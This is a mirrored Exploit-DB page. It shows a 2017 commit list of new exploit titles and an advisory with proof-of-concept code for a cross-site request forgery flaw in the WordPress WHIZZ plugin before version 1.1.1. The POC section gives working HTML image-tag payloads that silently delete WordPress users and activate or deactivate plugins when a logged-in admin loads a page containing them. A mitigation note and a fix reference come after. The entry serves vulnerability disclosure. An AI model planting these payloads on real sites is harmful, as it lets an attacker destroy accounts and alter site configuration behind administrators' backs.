bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41845.txt
Offensive Security ddb02a2ec6 DB: 2017-04-08 
16 new exploits

Aztek Forum 4.00 - 'myadmin.php' User Privilege Escalation
Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation
Intellinet NFC-30IR Camera - Multiple Vulnerabilities
Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery
Invoice Template - 'hash' Parameter SQL Injection
Document Management Template - 'hash' Parameter SQL Injection
Shopping Cart Template - 'item' Parameter SQL Injection
Calendar Template 2.0 - 'editid1' Parameter SQL Injection
Forum Template 1.0 - SQL Injection
Quiz Template 1.0 - 'testid' Parameter SQL Injection
Survey Template 1.1 - 'masterkey1' Parameter SQL Injection
My Gaming Ladder Combo System 7.5 - SQL Injection
Ladder System 6.0 - 'faqid' Parameter SQL Injection
WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting
QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection
e107 CMS 2.1.4 - Cross-Site Request Forgery
WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery
WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery
2017-04-08 05:01:18 +00:00

34 lines
No EOL
993 B
Text
Executable file
Raw Blame History

======
Software: WordPress WHIZZ
Version: <1.1.1
Homepage: https://wordpress.org/plugins/whizz/
=======
Description
================
Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status
POC:
========
include in the page ,then attack will occur:
delete user:
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users">
active or disactive plugins:
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
FIX:
==========
https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically
Reference in a new issue View git blame Copy permalink